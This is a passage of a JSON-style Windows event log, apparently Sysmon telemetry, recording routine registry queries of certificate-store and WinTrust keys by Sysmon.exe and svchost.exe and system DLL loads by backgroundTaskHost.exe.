131883571691670000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "wincorlib.dll", - "image_path": "C:\\Windows\\System32\\wincorlib.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691360000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691670000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "sppc.dll", - "image_path": "C:\\Windows\\System32\\sppc.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - 
}, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - 
"timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571691830000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_value": "{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\BrokerId", - "registry_value": "BrokerId", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\EventParameters", - "registry_value": "EventParameters", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": 
"\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\Flags", - "registry_value": "Flags", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\PackageFullName", - "registry_value": "PackageFullName", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "registry", - "pid": 780, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\system32\\svchost.exe", - "registry_key": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}", - "registry_path": "\\REGISTRY\\A\\{9f81483f-8c3f-4590-a6ca-6519d5b3a309}\\Events\\{159788d7-8d9e-418e-b43b-2edcf23cab7f}\\UserSid", - "registry_value": "UserSid", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-B293-5C05-0000-0010FAC80000}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Storage.ApplicationData.dll", - "image_path": "C:\\Windows\\System32\\Windows.Storage.ApplicationData.dll", - "pid": 6376, - "process_name": "backgroundTaskHost.exe", - "process_path": "C:\\Windows\\System32\\backgroundTaskHost.exe", - "timestamp": 131883571691520000, - "unique_pid": "{42FC7E13-CB30-5C05-0000-0010ACE05001}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": 
"Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571691830000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 